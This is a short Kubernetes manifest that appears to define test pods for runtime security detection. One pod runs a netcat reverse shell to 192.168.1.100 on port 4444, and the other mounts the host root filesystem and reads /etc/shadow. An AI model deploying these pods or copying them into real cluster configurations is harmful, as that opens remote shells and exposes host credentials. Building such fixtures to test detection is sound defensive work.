apiVersion: v1
kind: Pod
metadata:
  name: runtime-reverse-shell
spec:
  containers:
  - name: shell-container
    image: busybox
    # Simulates an outbound connection attempt on a common shell port
    command: ['sh', '-c', 'nc -e /bin/sh 192.168.1.100 4444 || sleep 3600']
---
apiVersion: v1
kind: Pod
metadata:
  name: runtime-host-mount
spec:
  containers:
  - name: escape-container
    image: busybox
    command: ['sh', '-c', 'ls /host/etc/shadow && sleep 3600']
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
